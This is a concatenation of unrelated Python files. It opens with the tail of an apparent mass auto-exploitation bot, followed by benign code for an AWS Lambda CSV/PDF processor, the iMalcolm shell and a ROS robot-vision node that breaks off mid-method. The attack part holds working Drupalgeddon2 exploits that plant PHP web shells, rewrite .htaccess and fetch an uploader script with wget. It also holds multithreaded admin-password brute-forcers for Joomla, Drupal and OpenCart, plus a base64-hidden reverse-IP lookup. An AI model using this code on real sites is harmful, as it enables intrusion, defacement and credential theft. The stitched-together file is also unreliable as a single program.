self.Version8Drupal(site)
else:
self.Version7Drupal(site)
except:
self.Print_NotVuln('Drupalgeddon2', site)
def Print_NotVuln(self, NameVuln, site):
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' + self.y + NameVuln + self.c + ' [Not Vuln]'
def Print_Vuln_index(self, indexPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + indexPath + self.g + ' [Index Uploaded!]'
def Print_vuln_Shell(self, shellPath):
print self.c + ' [' + self.y + '+' + self.c + '] ' + self.y + shellPath + self.g + ' [Shell Uploaded!]'
def Version7Drupal(self, site):
try:
payloadshell = "Vuln!!<?php system($_GET['cmd']); ?>"
PrivatePAyLoad = "echo 'Vuln!! patch it Now!' > vuln.htm;" \
" echo '" + payloadshell + "'> sites/default/files/vuln.php;" \
" echo '" + payloadshell + "'> vuln.php;" \
" cd sites/default/files/;" \
" echo 'AddType application/x-httpd-php .jpg' > .htaccess;" \
" wget 'https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/up.php'"
get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
'name[#markup]': PrivatePAyLoad, 'name[#type]': 'markup'}
post_params = {'form_id': 'user_pass', '_triggering_element_name': 'name'}
r = requests.post('http://' + site, data=post_params, params=get_params)
m = re.search(r'<input type="hidden" name="form_build_id" value="([^"]+)" />', r.text)
if m:
found = m.group(1)
get_params = {'q': 'file/ajax/name/#value/' + found}
post_params = {'form_build_id': found}
requests.post('http://' + site, data=post_params, params=get_params)
a = requests.get('http://' + site + '/sites/default/files/vuln.php', timeout=5)
if 'Vuln!!' in a.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/sites/default/files/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/sites/default/files/vuln.php?cmd=id' + '\n')
gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
CheckUploader = requests.get('http://' + site + '/sites/default/files/up.php', timeout=5)
if 'Vuln!!' in CheckUploader.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/sites/default/files/up.php')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/sites/default/files/up.php' + '\n')
if 'Vuln!!' in gg.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
gg = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in gg.text.encode('utf-8'):
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
Checkshell = requests.get('http://' + site + '/vuln.php', timeout=5)
if 'Vuln!!' in Checkshell.text.encode('utf-8'):
self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/vuln.php?cmd=id' + '\n')
else:
self.Print_NotVuln('Drupalgeddon2', site)
else:
self.Print_NotVuln('Drupalgeddon2', site)
except:
self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
def Version8Drupal(self, site):
try:
Exp = site + '/user/register/?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
payloadshell = "<?php system($_GET['cmd']); ?>"
payload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
'mail[#type]': 'markup', 'mail[#markup]': 'echo Vuln!! patch it Now!> vuln.htm'}
payload2 = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec',
'mail[#type]': 'markup', 'mail[#markup]': 'echo "' + payloadshell + '"> vuln.php'}
r = requests.post('http://' + Exp, data=payload, timeout=5)
if r.status_code == 200:
a = requests.get('http://' + site + '/vuln.htm', timeout=5)
if 'Vuln!!' in a.text.encode('utf-8'):
requests.post('http://' + Exp, data=payload2, timeout=5)
CheckShell = requests.get('http://' + site + '/vuln.php', timeout=5)
if CheckShell.status_code == 200:
self.Print_vuln_Shell(site + '/vuln.php?cmd=id')
with open('result/Shell_results.txt', 'a') as writer:
writer.write(site + '/vuln.php?cmd=id' + '\n')
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_Vuln_index(site + '/vuln.htm')
with open('result/Index_results.txt', 'a') as writer:
writer.write(site + '/vuln.htm' + '\n')
else:
self.Print_NotVuln('Drupalgeddon2', site)
else:
self.Print_NotVuln('Drupalgeddon2', site)
except:
self.Print_NotVuln('Drupalgeddon2 Timeout!', site)
class JooMLaBruteForce(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.Joomla, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'Joomla BruteForce' + self.c + ' [Not Vuln]'
def Joomla(self, site, passwd):
try:
sess = requests.session()
GetToken = sess.get('http://' + site + '/administrator/index.php', timeout=5)
try:
ToKeN = re.findall('type="hidden" name="(.*)" value="1"',
GetToken.text.encode('utf-8'))[0]
GeTOPtIoN = re.findall('type="hidden" name="option" value="(.*)"', GetToken.text.encode('utf-8'))[0]
except:
ToKeN = ''
GeTOPtIoN = 'com_login'
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['username'] = "admin"
post['passwd'] = passwd
post['lang'] = 'en-GB'
post['option'] = GeTOPtIoN
post['task'] = 'login'
post[ToKeN] = '1'
url = "http://" + site + "/administrator/index.php"
GoT = sess.post(url, data=post, headers=agent, timeout=10)
if 'logout' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'Joomla' + self.g + ' [Hacked!!]'
with open('result/Joomla_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/administrator/index.php' + '\n Username: admin' +
'\n Password: ' + passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class DrupalBruteForce(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.Drupal, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'Drupal BruteForce' + self.c + ' [Not Vuln]'
def Drupal(self, site, passwd):
try:
sess = requests.session()
GetToken = sess.get('http://' + site + '/user/login', timeout=5)
try:
GetOP = re.findall('id="edit-submit" name="op" value="(.*)"',
GetToken.text.encode('utf-8'))[0].split('"')[0]
except:
GetOP = 'Log in'
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['name'] = "admin"
post['pass'] = passwd
post['form_id'] = 'user_login'
post['op'] = GetOP
url = "http://" + site + "/user/login"
GoT = sess.post(url, data=post, headers=agent, timeout=10)
if 'Log out' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'Drupal' + self.g + ' [Hacked!!]'
with open('result/Drupal_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/user/login' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class OpenCart(object):
def __init__(self, site):
self.flag = 0
self.r = '\033[31m'
self.g = '\033[32m'
self.y = '\033[33m'
self.b = '\033[34m'
self.m = '\033[35m'
self.c = '\033[36m'
self.w = '\033[37m'
self.rr = '\033[39m'
self.password = ["admin", "demo", "admin123", "123456", "123456789", "123", "1234", "12345", "1234567", "12345678",
"123456789", "admin1234", "admin123456", "pass123", "root", "321321", "123123", "112233", "102030",
"password", "pass", "qwerty", "abc123", "654321", "pass1234", "abc1234", "demo1", "demo2",
"demodemo", "site", "shop", "password123", "admin1", "admin12", "adminqwe", "test", "test123", "1",
"12", "123123"]
thread = []
for passwd in self.password:
t = threading.Thread(target=self.opencart, args=(site, passwd))
if self.flag == 0:
break
else:
t.start()
thread.append(t)
time.sleep(0.08)
for j in thread:
j.join()
if self.flag == 0:
print self.c + ' [' + self.y + '-' + self.c + '] ' + self.r + site + ' ' \
+ self.y + 'OpenCart' + self.c + ' [Not Vuln]'
def opencart(self, site, passwd):
try:
agent = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0'}
post = {}
post['username'] = "admin"
post['password'] = passwd
url = "http://" + site + "/admin/index.php"
GoT = requests.post(url, data=post, headers=agent, timeout=10)
if 'Logout' in GoT.text.encode('utf-8'):
print self.c + ' [' + self.y + '+' + self.c + '] ' +\
self.r + site + ' ' + self.y + 'OpenCart' + self.g + ' [Hacked!!]'
with open('result/OpenCart_Hacked.txt', 'a') as writer:
writer.write('http://' + site + '/admin/index.php' + '\n Username: admin' + '\n Password: ' +
passwd + '\n-----------------------------------------\n')
self.flag = 1
except Exception, e:
pass
class reverse_ipz(object):
def __init__(self):
self.headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
'Accept': '*/*'}
def Reverse_ip(self, domain_Or_ipAddress):
Check = domain_Or_ipAddress
if Check.startswith("http://"):
Check = Check.replace("http://", "")
elif Check.startswith("https://"):
Check = Check.replace("https://", "")
else:
pass
try:
self.ip = socket.gethostbyname(Check)
except:
sys.exit()
Rev = requests.get(binascii.a2b_base64('aHR0cDovL3ZpZXdkbnMuaW5mby9yZXZlcnNlaXAvP2hvc3Q9') + self.ip + '&t=1',
headers=self.headers, timeout=5)
Revlist = re.findall('<tr> <td>((([a-zA-Z0-9-_]+\.)*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}))</td>', Rev.text)
if len(Revlist) == 1000:
for url in Revlist:
with open('logs/' + self.ip + 'x.txt', 'a') as xx:
xx.write(str(url[0]) + '\n')
gotoBing = BingDorker()
gotoBing.ip_bing(self.ip)
else:
for url in Revlist:
with open('logs/' + self.ip + '.txt', 'a') as xx:
xx.write(str(url[0]) + '\n')
class BingDorker(object):
def ip_bing(self, __ip):
try:
if __ip.startswith("http://"):
__ip = __ip.replace("http://", "")
elif __ip.startswith("https://"):
__ip = __ip.replace("https://", "")
else:
pass
try:
ip = socket.gethostbyname(__ip)
except:
sys.exit()
next = 0
while next <= 500:
url = "http://www.bing.com/search?q=ip%3A" + ip + "&first=" + str(next) + "&FORM=PORE"
sess = requests.session()
cnn = sess.get(url, timeout=5)
next = next + 10
finder = re.findall(
'<h2><a href="((?:https://|http://)[a-zA-Z0-9-_]+\.*[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11})',
cnn.text)
for url in finder:
if url.startswith('http://'):
url = url.replace('http://', '')
elif url.startswith('https://'):
url = url.replace('https://', '')
else:
pass
with open("logs/" + ip + "x.txt", 'a') as f:
if 'go.microsoft.com' in url:
pass
else:
f.write(str(url + '\n'))
lines = open("logs/" + ip + "x.txt", 'r').read().splitlines()
lines_set = set(lines)
count = 0
for line in lines_set:
with open("logs/" + ip + ".txt", 'a') as xx:
count = count + 1
xx.write(line + '\n')
os.unlink("logs/" + ip + "x.txt")
except IOError:
sys.exit()
except IndexError:
sys.exit()
Rock = AutoExploiter()
|
process_stream.py
|
import boto3
import logging
import csv
import os
import requests
from datetime import datetime
from botocore.exceptions import ClientError
from boto3.dynamodb.types import TypeDeserializer
from multiprocessing import Process, Pipe
#leverage freezing
TABLE = None
S3CLIENT = None
DESERIALIZER = None
BUCKET_NAME = os.environ['BUCKET_NAME']
def upload_file(target_names, bucket_details):
# upload file to S3 bucket
if sub_folder := bucket_details['folder']:
object_name = sub_folder + "/{}".format(target_names['dest'])
else:
object_name = target_names['dest']
try:
response = S3CLIENT.upload_file(
target_names['src'],
bucket_details['bucket'],
object_name
)
except ClientError as e:
logging.error(e)
return False
return True
def extract_record_data(event):
# extract entry metadata
for record in event['Records']:
if record['eventName'] == "INSERT":
yield {
key: DESERIALIZER.deserialize(val) for key, val in record['dynamodb']['NewImage'].items()
}
def create_csv_name():
# generate a csv file name from the current time
now = datetime.now()
file_name = now.strftime("%a_%b_%d_%y_%H%M%S.%f.csv")
return file_name
def write_to_csv(file_name, event):
# write event data to specified csv file
headed = False
with open(file_name, "w") as csv_file:
for data in extract_record_data(event):
# start the dict writer and add fields if this is the first entry
if not headed:
field_names = [key for key in data.keys()]
entry_writer = csv.DictWriter(csv_file, field_names)
entry_writer.writeheader()
headed = True
# write info
entry_writer.writerow(data)
# delete if empty (TODO: a different way to handle mass deletions)
if os.stat(file_name).st_size == 0:
os.remove(file_name)
def generate_csv(event):
# write and upload a csv file containing the record data from the stream
# this data shall be put in an RD solution later
file_name = create_csv_name()
local_file_name = "/tmp/" + file_name
write_to_csv(local_file_name, event)
# upload the csv file
upload_file(
{
'src': local_file_name,
'dest': file_name
},
{
'bucket': BUCKET_NAME,
'folder': 'csv'
}
)
def extract_pdf_link(data):
# return the first pdf in the record
return next(
(
link['href'] for link in data['links']
if link['type'] == "application/pdf"
), "")
def fetch_pdf(raw_id, url, conn):
# stream response from url into pdf file
file_name = raw_id + ".pdf"
local_file_name = "/tmp/" + file_name
response = requests.get(url, stream=True)
if response.status_code == 200:
with open(local_file_name, 'wb') as pdf_file:
for chunk in response.raw:
pdf_file.write(chunk)
# upload the pdf file
upload_file(
{
'src': local_file_name,
'dest': file_name
},
{
'bucket': BUCKET_NAME,
'folder': 'pdf'
}
)
conn.close()
def download_pdfs(event):
# download and then upload article pdfs to s3 storage
# leverage pipes for parallel execution (pools and queues not available in Lambda)
procs = []
for data in extract_record_data(event):
raw_id = data['rawid']
url = extract_pdf_link(data)
# one process per download
parent_conn, child_conn = Pipe()
process = Process(target=fetch_pdf, args=(raw_id, url, child_conn))
procs.append(process)
# start
for proc in procs:
proc.start()
# join
for proc in procs:
proc.join()
def process_records(event):
# create a csv in an s3 bucket containing the entry data recorded in the event
# download the article pdfs to an s3 bucket
generate_csv(event)
download_pdfs(event)
def main(event, context):
global S3CLIENT, DESERIALIZER
# load bucket
if S3CLIENT is None:
S3CLIENT = boto3.client('s3')
# load serializer
if DESERIALIZER is None:
DESERIALIZER = TypeDeserializer()
# logging
logging.root.setLevel(logging.INFO)
# process records
try:
logging.info(event['Records'])
logging.info("Processing %i records..." % len(event['Records']))
process_records(event)
except ClientError as cerr:
logging.error(cerr)
except Exception as ex:
logging.error(ex)
|
imalcolm.py
|
#!/dls_sw/prod/tools/RHEL6-x86_64/defaults/bin/dls-python
def make_async_logging(log_config):
# Now we have our user specified logging config, pipe all logging messages
# through a queue to make it asynchronous
from malcolm.compat import QueueListener, queue
import logging.config
# These are the handlers for our root logger, they should go through a queue
root_handlers = log_config["root"].pop("handlers")
# Create a new handler to replace all the above that just pops messages on
# a queue, and set it as the handler for the root logger (and children)
q = queue.Queue()
log_config["handlers"]["queue"] = {
"class": "malcolm.compat.QueueHandler", "queue": q}
log_config["root"]["handlers"] = ["queue"]
logging.config.dictConfig(log_config)
# Now make a queue listener that consumes messages on the queue and forwards
# them to any of the appropriate original root handlers
handlers = [logging._handlers[h] for h in root_handlers]
listener = QueueListener(q, *handlers, respect_handler_level=True)
return listener
def make_process():
import sys
import threading
import argparse
import atexit
import os
import getpass
import json
from ruamel import yaml
# These are the locals that we will pass to the console
locals_d = {}
parser = argparse.ArgumentParser(
description="Interactive shell for malcolm")
parser.add_argument(
'--client', '-c',
help="Add a client to given server, like ws://localhost:8080 or pva")
parser.add_argument(
'--logcfg', help="Logging dict config in JSON or YAML file")
parser.add_argument(
"--profiledir", help="Directory to store profiler results in",
default="/tmp/imalcolm_profiles")
parser.add_argument(
'yaml', nargs="?",
help="The YAML file containing the blocks to be loaded")
args = parser.parse_args()
log_config = {
"version": 1,
"disable_existing_loggers": False,
"formatters": {
"simple": {
"format": "%(name)s: %(message)s"
},
"extended": {
"format": "%(asctime)s - %(levelname)6s - %(name)s\n"
" %(message)s"
},
},
"handlers": {
"console": {
"class": "logging.StreamHandler",
"level": "WARNING",
"formatter": "simple",
"stream": "ext://sys.stdout"
},
# "local_file_handler": {
# "class": "logging.handlers.RotatingFileHandler",
# "level": "DEBUG",
# "formatter": "extended",
# "filename": "/tmp/debug.log",
# "maxBytes": 100048576,
# "backupCount": 4,
# "encoding": "utf8"
# },
"graylog_gelf": {
"class": "pygelf.GelfUdpHandler",
# Obviously a DLS-specific configuration: the graylog server
# address and port
"host": "cs04r-sc-serv-14.diamond.ac.uk",
"port": 12202,
"debug": True,
"level": "DEBUG",
# The following custom fields will be disabled if setting this
# False
"include_extra_fields": True,
"username": getpass.getuser(),
"pid": os.getpid()
}
},
# "loggers": {
# # Fine-grained logging configuration for individual modules or
# # classes
# # Use this to set different log levels without changing 'real' code.
# "myclasses": {
# "level": "DEBUG",
# "propagate": True
# },
# "usermessages": {
# "level": "INFO",
# "propagate": True,
# "handlers": ["console"]
# }
# },
"root": {
"level": "DEBUG",
"handlers": ["graylog_gelf", "console"],
}
}
if args.logcfg:
with open(args.logcfg) as f:
text = f.read()
if args.logcfg.endswith(".json"):
file_config = json.loads(text)
else:
file_config = yaml.load(text, Loader=yaml.RoundTripLoader)
if file_config:
log_config = file_config
# Start it off, and tell it to stop when we quit
listener = make_async_logging(log_config)
listener.start()
atexit.register(listener.stop)
# Setup Qt gui, must be done before any malcolm imports otherwise cothread
# starts in the wrong thread
try:
os.environ['DISPLAY']
# If this environment variable doesn't exist then there is probably no
# X server for us to talk to.
except KeyError:
qt_thread = None
else:
from PyQt4.Qt import QApplication
# Start qt
def start_qt():
app = QApplication(sys.argv)
app.setQuitOnLastWindowClosed(False)
locals_d["app"] = app
from malcolm.gui.guiopener import GuiOpener
global opener
opener = GuiOpener()
app.exec_()
qt_thread = threading.Thread(target=start_qt)
qt_thread.setDaemon(True)
def gui(block):
global opener
opener.open_gui(block, proc)
locals_d["gui"] = gui
# Setup profiler dir
try:
from malcolm.modules.profiling.parts import ProfilingViewerPart
from malcolm.modules.profiling.profiler import Profiler
except ImportError:
raise
else:
if not os.path.isdir(args.profiledir):
os.mkdir(args.profiledir)
ProfilingViewerPart.profiledir = args.profiledir
locals_d["profiler"] = Profiler(args.profiledir)
#locals_d["profiler"].start()
from malcolm.core import Process, call_with_params, Context, Queue
from malcolm.modules.builtin.blocks import proxy_block
from malcolm.yamlutil import make_include_creator
if args.yaml:
proc_name = os.path.basename(args.yaml).split(".")[-2]
proc = Process(proc_name)
assembly = make_include_creator(args.yaml)
call_with_params(assembly, proc)
proc_name = "%s - imalcolm" % proc_name
else:
proc = Process("Process")
proc_name = "imalcolm"
# set terminal title
sys.stdout.write("\x1b]0;%s\x07" % proc_name)
if args.client:
if args.client.startswith("ws://"):
from malcolm.modules.web.controllers import WebsocketClientComms
hostname, port = args.client[5:].split(":")
comms = call_with_params(
WebsocketClientComms, proc, [],
mri="%s:%s" % (hostname, port), hostname=hostname,
port=int(port))
elif args.client == "pva":
from malcolm.modules.pva.controllers import PvaClientComms
comms = call_with_params(PvaClientComms, proc, [], mri="pva")
else:
raise ValueError(
"Don't know how to create client to %s" % args.client)
proc.add_controller(comms.mri, comms)
class UserContext(Context):
def make_queue(self):
return Queue(user_facing=True)
def post(self, path, params=None, timeout=None):
try:
return super(UserContext, self).post(path, params, timeout)
except KeyboardInterrupt:
self.post([path[0], "abort"])
raise
def make_proxy(self, comms, mri):
call_with_params(proxy_block, proc, comms=comms, mri=mri)
locals_d["self"] = UserContext(proc)
if qt_thread:
qt_thread.start()
proc.start()
locals_d["process"] = proc
return locals_d
def main():
locals_d = make_process()
header = """Welcome to iMalcolm.
self.mri_list:
%s
Try:
hello = self.block_view("HELLO")
print hello.greet("me")
or
gui(self.block_view("COUNTER"))
or
self.make_proxy("localhost:8080", "HELLO")
print self.block_view("HELLO").greet("me")
""" % (locals_d["self"].mri_list,)
try:
import IPython
except ImportError:
import code
code.interact(header, local=locals_d)
else:
locals().update(locals_d)
IPython.embed(header=header)
if "app" in locals_d:
locals_d["app"].quit()
if "profiler" in locals_d:
if locals_d["profiler"].started:
locals_d["profiler"].stop()
# TODO: tearDown doesn't work properly yet
# locals_d["process"].stop()
if __name__ == "__main__":
print("Loading...")
import os
import sys
os.environ["EPICS_CA_MAX_ARRAY_BYTES"] = "6000000"
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
from pkg_resources import require
#sys.path.insert(0,
# "/dls_sw/work/tools/RHEL6-x86_64/odin/venv/lib/python2.7/"
# "site-packages")
require("tornado", "numpy", "ruamel.yaml", "cothread==2.14", "vdsgen==0.2",
"pygelf==0.3.1", "scanpointgenerator", "plop", "h5py==2.7.1")
#sys.path.append(os.path.join(os.path.dirname(__file__), "..", "..", "cothread"))
#sys.path.append(
# "/home/tmc43/virtualenvs/pymalcolm/lib/python2.7/site-packages")
sys.path.append(
"/dls_sw/work/R3.14.12.3/support/pvaPy/lib/python/2.7/linux-x86_64")
main()
|
vision.py
|
#! /usr/bin/env python3
import os
import cv2
import rospy
import rospkg
from copy import deepcopy
from cv_bridge import CvBridge
from threading import Thread, Lock
from dynamic_reconfigure.server import Server
from sensor_msgs.msg import Image
from geometry_msgs.msg import PolygonStamped
from humanoid_league_msgs.msg import BallInImageArray, LineInformationInImage, \
ObstacleInImageArray, ObstacleInImage, RegionOfInterestWithImage, \
GoalPostInImageArray, Audio
from bitbots_vision.vision_modules import lines, field_boundary, color, debug, \
obstacle, yolo_handler, ros_utils, candidate
from bitbots_vision.cfg import VisionConfig
from bitbots_msgs.msg import Config, ColorLookupTable
try:
from profilehooks import profile, timecall # Profilehooks profiles certain functions in you add the @profile or @timecall decorator.
except ImportError:
rospy.loginfo("No Profiling avalabile", logger_name="vision")
class Vision:
"""
The Vision is the main ROS-node for handling all tasks related to image processing.
This class defines the whole image processing pipeline, which uses the modules from the `vision_modules`.
It also handles the dynamic reconfiguration of the bitbots_vision.
"""
def __init__(self):
# type () -> None
"""
Initiating 'bitbots_vision' node.
:return: None
"""
rospack = rospkg.RosPack()
self._package_path = rospack.get_path('bitbots_vision')
rospy.init_node('bitbots_vision')
rospy.loginfo('Initializing vision...', logger_name="vision")
self._cv_bridge = CvBridge()
self._config = {}
# Publisher placeholder
self._pub_audio = None
self._pub_balls = None
self._pub_lines = None
self._pub_line_mask = None
self._pub_obstacle = None
self._pub_goal_posts = None
#self._pub_ball_fcnn = None
self._pub_debug_image = None
#self._pub_debug_fcnn_image = None
self._pub_convex_field_boundary = None
self._pub_white_mask_image = None
self._pub_red_mask_image = None
self._pub_blue_mask_image = None
self._pub_field_mask_image = None
self._pub_dynamic_color_lookup_table_field_mask_image = None
# Subscriber placeholder
self._sub_image = None
self._sub_dynamic_color_lookup_table_msg_topic = None
# Debug image drawer placeholder
self._debug_image_creator = None
# Register static publishers
# Register publisher of 'vision_config'-messages
# For changes of topic name: also change topic name in dynamic_color_lookup_table.py
self._pub_config = rospy.Publisher(
'vision_config',
Config,
queue_size=1,
latch=True)
# Needed for operations that should only be executed on the first image
self._first_image_callback = True
# Reconfigure data transfer variable
self._transfer_reconfigure_data = None
self._transfer_reconfigure_data_mutex = Lock()
# Image transfer variable
self._transfer_image_msg = None
self._transfer_image_msg_mutex = Lock()
# Yolo placeholder
self._yolo = None
# Add model enums to _config
ros_utils.add_model_enums(VisionConfig, self._package_path)
ros_utils.add_color_lookup_table_enum(VisionConfig, self._package_path)
# Register VisionConfig server (dynamic reconfigure) and set callback
srv = Server(VisionConfig, self._dynamic_reconfigure_callback)
# Add general params
ros_utils.set_general_parameters(["caching"])
# Define the rate of a sleep timer
self._rate = rospy.Rate(100)
# Run the vision main loop
self._main_loop()
def _main_loop(self):
"""
Main loop that processes the images and configuration changes
"""
while not rospy.is_shutdown():
# Check for reconfiguration data
if self._transfer_reconfigure_data is not None:
# Copy reconfigure data from shared memory
with self._transfer_reconfigure_data_mutex:
reconfigure_data = deepcopy(self._transfer_reconfigure_data)
self._transfer_reconfigure_data = None
# Run vision reconfiguration
self._configure_vision(*reconfigure_data)
# Check for new image
elif self._transfer_image_msg is not None:
# Copy image from shared memory
with self._transfer_image_msg_mutex:
image_msg = self._transfer_image_msg
self._transfer_image_msg = None
# Run the vision pipeline
self._handle_image(image_msg)
# Now the first image has been processed
self._first_image_callback = False
else:
try:
self._rate.sleep()
except rospy.exceptions.ROSTimeMovedBackwardsException:
pass
def _dynamic_reconfigure_callback(self, config, level):
"""
Callback for the dynamic reconfigure configuration.
:param config: New _config
:param level: The level is a definable int in the Vision.cfg file. All changed params are or ed together by dynamic reconfigure.
"""
with self._transfer_reconfigure_data_mutex:
# Set data
self._transfer_reconfigure_data = (config, level)
return config
def _configure_vision(self, config, level):
"""
Handle dynamic reconfigure configuration.
:param config: New _config
:param level: The level is a definable int in the Vision.cfg file. All changed params are or ed together by dynamic reconfigure.
"""
self._register_or_update_all_publishers(config)
# Set max number of balls
self._max_balls = config['ball_candidate_max_count']
# Set some thresholds
# Brightness threshold which determines if the camera cap is on the camera.
self._blind_threshold = config['vision_blind_threshold']
# Threshold for ball candidates
self._ball_candidate_threshold = config['ball_candidate_rating_threshold']
# Maximum offset for balls over the convex field boundary
self._ball_candidate_y_offset = config['ball_candidate_field_boundary_y_offset']
# Maximum offset for balls over the convex field boundary
self._goal_post_field_boundary_y_offset = config['goal_post_field_boundary_y_offset']
# Which line type should we publish?
self._use_line_points = config['line_detector_use_line_points']
self._use_line_mask = config['line_detector_use_line_mask']
# Should the debug image be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_debug_image'):
if config['vision_publish_debug_image']:
rospy.loginfo('Debug images are enabled', logger_name="vision")
else:
rospy.loginfo('Debug images are disabled', logger_name="vision")
# Create debug drawer
self._debug_image_creator = debug.DebugImage(config['vision_publish_debug_image'])
'''
# Should the fcnn output (only under the field boundary) be published?
if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_output'):
self._ball_fcnn_publish_output = config['ball_fcnn_publish_output']
if self._ball_fcnn_publish_output:
rospy.loginfo('ball FCNN output publishing is enabled', logger_name="vision")
else:
rospy.loginfo('ball FCNN output publishing is disabled', logger_name="vision")
# Should the whole fcnn output be published?
if ros_utils.config_param_change(self._config, config, 'ball_fcnn_publish_debug_img'):
self._publish_fcnn_debug_image = config['ball_fcnn_publish_debug_img']
if self._publish_fcnn_debug_image:
rospy.loginfo('Ball FCNN debug image publishing is enabled', logger_name="vision_fcnn")
else:
rospy.loginfo('Ball FCNN debug image publishing is disabled', logger_name="vision_fcnn")
'''
# Should the HSV mask images be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_HSV_mask_image'):
self._publish_HSV_mask_image = config['vision_publish_HSV_mask_image']
if self._publish_HSV_mask_image:
rospy.loginfo('HSV mask image publishing is enabled', logger_name="vision_hsv_color_detector")
else:
rospy.loginfo('HSV mask image publishing is disabled', logger_name="vision_hsv_color_detector")
# Should the (dynamic color lookup table-) field mask image be published?
if ros_utils.config_param_change(self._config, config, 'vision_publish_field_mask_image'):
self._publish_field_mask_image = config['vision_publish_field_mask_image']
if self._publish_field_mask_image:
rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is enabled', logger_name="dynamic_color_lookup_table")
else:
rospy.loginfo('(Dynamic color lookup table-) Field mask image publishing is disabled', logger_name="dynamic_color_lookup_table")
# Set the white color detector
if ros_utils.config_param_change(self._config, config, r'^white_color_detector_'):
if config['white_color_detector_use_color_lookup_table']:
self._white_color_detector = color.PixelListColorDetector(config, self._package_path, 'white_color_detector_color_lookup_table_path')
else:
self._white_color_detector = color.HsvSpaceColorDetector(config, "white")
# Set the red color detector
if ros_utils.config_param_change(self._config, config, r'^red_color_detector_'):
self._red_color_detector = color.HsvSpaceColorDetector(config, "red")
# Set the blue color detector
if ros_utils.config_param_change(self._config, config, r'^blue_color_detector_'):
self._blue_color_detector = color.HsvSpaceColorDetector(config, "blue")
# Check if params changed
if ros_utils.config_param_change(self._config, config,
r'^field_color_detector_|dynamic_color_lookup_table_') and not config['field_color_detector_use_hsv']:
# Check if the dynamic color lookup table field color detector or the static field color detector should be used
if config['dynamic_color_lookup_table_active']:
# Set dynamic color lookup table field color detector
self._field_color_detector = color.DynamicPixelListColorDetector(
config,
self._package_path)
else:
# Unregister old subscriber
